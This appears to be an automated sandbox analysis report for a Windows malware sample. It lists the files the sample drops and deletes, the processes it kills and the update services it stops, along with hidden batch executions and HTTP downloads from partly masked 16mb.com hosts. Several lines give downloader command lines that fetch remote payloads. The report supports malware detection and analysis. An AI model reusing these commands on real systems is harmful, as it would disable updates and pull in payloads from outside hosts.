Technical Information
Malicious functions
Executes the following
- '%WINDIR%\syswow64\taskkill.exe' /F /IM SMΔRTP.exe
- '%WINDIR%\syswow64\net.exe' stop wuauserv
- '%WINDIR%\syswow64\net.exe' stop bits
- '%WINDIR%\syswow64\net.exe' stop dosvc
Modifies file system
Creates the following files
- %WINDIR%\syswow64\nvidiadisplayamdcontainer.exe
- %WINDIR%\syswow64\getsecberjalur.deb
- %WINDIR%\syswow64\getsecberjalur.vpx
- %WINDIR%\syswow64\go go.gif
- %TEMP%\d01a.tmp\getapcc-v2.bat
- %WINDIR%\syswow64\getapcc-v2.exe
- %WINDIR%\syswow64\getapcc-v2.py
- %WINDIR%\syswow64\getapcc-v2.vpx
- %WINDIR%\syswow64\smadav-tk.exe
- %TEMP%\e32d.tmp\getgoxxxberjalur.bat
- %WINDIR%\syswow64\getgoxxxberjalur sysleave.deb
- %TEMP%\recognition_keep-fresh.exe
- %TEMP%\1026.tmp\recognition_keep-fresh.bat
- %TEMP%\getkeep-fresh.exe
- %TEMP%\ipmgui.dat
- %TEMP%\productutilities.dll
- %TEMP%\avira_free_antivirus_en_100.ico
- %TEMP%\b9cd.tmp\getsecberjalur.bat
- %WINDIR%\syswow64\getsecberjalur.exe
- %WINDIR%\syswow64\v™.apx
- %TEMP%\b28c.tmp\v.bat
- %TEMP%\smadav-tk.lnk
- %WINDIR%\syswow64\cable.runstime.exe
- %WINDIR%\syswow64\cegahchromefox.exe
- %WINDIR%\syswow64\exc.exe
- %WINDIR%\syswow64\recognition_keep-fresh-.exe
- %WINDIR%\syswow64\getvgoxxxberjalur.exe
- %WINDIR%\syswow64\getapccberjalur.exe
- %WINDIR%\syswow64\getvcusberjalur.exe
- %TEMP%\2ad7.tmp\hpuschromefoxstp.bat
- %WINDIR%\syswow64\getgoxxxberjalur.exe
- %WINDIR%\syswow64\smadav-help.exe
- %WINDIR%\syswow64\recognition-™-fresh.pvx
- %WINDIR%\syswow64\t9'™.apx
- nul
- %TEMP%\8a73.tmp\exc.bat
- %WINDIR%\syswow64\acquisition exc.py
- %WINDIR%\syswow64\exc™.bat
- %TEMP%\systeminfo-x64-or-x86-based-custom.txt
- %TEMP%\7d59.tmp\serv acquisition-fr.bat
- %WINDIR%\syswow64\custom_amd64.deb
- %WINDIR%\syswow64\hpuschromefoxstp_amd64.deb
Deletes the following files
- %WINDIR%\syswow64\acquisition exc.py
- %TEMP%\recognition_keep-fresh.exe
- %WINDIR%\syswow64\hpuschromefoxstp_amd64.deb
- %TEMP%\2ad7.tmp\hpuschromefoxstp.bat
- %WINDIR%\syswow64\cable.runstime.exe
- %WINDIR%\syswow64\cegahchromefox.exe
- %WINDIR%\syswow64\exc.exe
- %TEMP%\b9cd.tmp\getsecberjalur.bat
- %WINDIR%\syswow64\recognition_keep-fresh-.exe
- %WINDIR%\syswow64\getapccberjalur.exe
- %WINDIR%\syswow64\getvcusberjalur.exe
- %WINDIR%\syswow64\smadav-help.exe
- %WINDIR%\syswow64\smadav-tk.exe
- %WINDIR%\syswow64\custom_amd64.deb
- %WINDIR%\syswow64\recognition-™-fresh.pvx
- %TEMP%\avira_free_antivirus_en_100.ico
- %TEMP%\1026.tmp\recognition_keep-fresh.bat
- %TEMP%\productutilities.dll
- %TEMP%\ipmgui.dat
- %TEMP%\getkeep-fresh.exe
- %TEMP%\8a73.tmp\exc.bat
- %WINDIR%\syswow64\v™.apx
- %TEMP%\b28c.tmp\v.bat
- %WINDIR%\syswow64\getsecberjalur.exe
- %WINDIR%\syswow64\getsecberjalur.deb
- %WINDIR%\syswow64\getsecberjalur.vpx
- %WINDIR%\syswow64\t9'™.apx
- %WINDIR%\syswow64\getvgoxxxberjalur.exe
- %WINDIR%\syswow64\go go.gif
- %WINDIR%\syswow64\getapcc-v2.py
- %WINDIR%\syswow64\getapcc-v2.vpx
- %TEMP%\d01a.tmp\getapcc-v2.bat
- %WINDIR%\syswow64\getgoxxxberjalur.exe
- %WINDIR%\syswow64\getgoxxxberjalur sysleave.deb
- %TEMP%\e32d.tmp\getgoxxxberjalur.bat
- %WINDIR%\syswow64\exc™.bat
- %WINDIR%\syswow64\getapcc-v2.exe
- %TEMP%\7d59.tmp\serv acquisition-fr.bat
Network activity
Connects to
- 'localhost':80
TCP
HTTP GET requests
- http://ke####n.16mb.com/c.o.s.r/(default).php
- http://ke####n.16mb.com/getapcc-v2/(default).php
- http://ke####n.16mb.com/goxxx/(default).php
- http://pi##.##walkun.16mb.com/AH
- http://pi##.##walkun.16mb.com/AH/
UDP
- DNS ASK google.com
- DNS ASK ke####n.16mb.com
- DNS ASK pi##.##walkun.16mb.com
Miscellaneous
Searches for the following windows
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: ''
Creates and executes the following
- '%WINDIR%\syswow64\nvidiadisplayamdcontainer.exe'
- '%WINDIR%\syswow64\getapcc-v2.exe' --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -N --tries=77 --read-timeout=300 http://ke####n.16mb.com/getapcc-v2/(default).php
- '%TEMP%\getkeep-fresh.exe' --referer=user(hiihfipr)T9 --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -N --tries=77 --read-timeout=300 http://pi##.##walkun.16mb.com/AH
- '%TEMP%\recognition_keep-fresh.exe'
- '%WINDIR%\syswow64\getgoxxxberjalur.exe' --referer=user(hiihfipr) --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -N --tries=77 --read-timeout=300 http://ke####n.16mb.com/goxxx/(defaul...
- '%WINDIR%\syswow64\getvgoxxxberjalur.exe'
- '%WINDIR%\syswow64\getvcusberjalur.exe'
- '%WINDIR%\syswow64\recognition_keep-fresh-.exe'
- '%WINDIR%\syswow64\getsecberjalur.exe' --referer=user(hiihfipr) --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -N --tries=77 --read-timeout=300 http://ke####n.16mb.com/c.o.s.r/(defa...
- '%WINDIR%\syswow64\getapccberjalur.exe'
- '%WINDIR%\syswow64\smadav-help.exe'
- '%WINDIR%\syswow64\smadav-tk.exe'
- '%WINDIR%\syswow64\exc.exe'
- '%WINDIR%\syswow64\cegahchromefox.exe'
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7D59.tmp\Serv Acquisition-Fr.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\B9CD.tmp\getsecberjalur.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\D01A.tmp\getapcc-v2.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\B28C.tmp\v.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\E32D.tmp\getgoxxxberjalur.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8A73.tmp\exc.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\1026.tmp\recognition_keep-fresh.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\2AD7.tmp\hpuschromefoxstp.bat" "' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7D59.tmp\Serv Acquisition-Fr.bat" "
- '%WINDIR%\syswow64\net1.exe' stop wuauserv
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\2AD7.tmp\hpuschromefoxstp.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\1026.tmp\recognition_keep-fresh.bat" "
- '%WINDIR%\syswow64\ping.exe' -n 6 localhost
- '%WINDIR%\syswow64\ping.exe' -n 3 localhost
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 10 REM waits given amount of time, set to 10 seconds
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\E32D.tmp\getgoxxxberjalur.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\D01A.tmp\getapcc-v2.bat" "
- '%WINDIR%\syswow64\ping.exe' -n 1 23.6.98.234
- '%WINDIR%\syswow64\net1.exe' stop bits
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\B9CD.tmp\getsecberjalur.bat" "
- '%WINDIR%\syswow64\reg.exe' DELETE "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled /f
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\B28C.tmp\v.bat" "
- '%WINDIR%\syswow64\findstr.exe' "XP"
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" type "%TEMP%\systeminfo-x64-or-x86-based-custom.txt" "
- '%WINDIR%\syswow64\findstr.exe' /B /C:"OS Name" /C:"System Model" /C:"System Type" /C:"Host Name"
- '%WINDIR%\syswow64\systeminfo.exe'
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8A73.tmp\exc.bat" "
- '%WINDIR%\syswow64\find.exe' "TTL="
- '%WINDIR%\syswow64\ping.exe' -n 1 www.google.com
- '%WINDIR%\syswow64\reg.exe' DELETE "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled /f
- '%WINDIR%\syswow64\net1.exe' stop dosvc
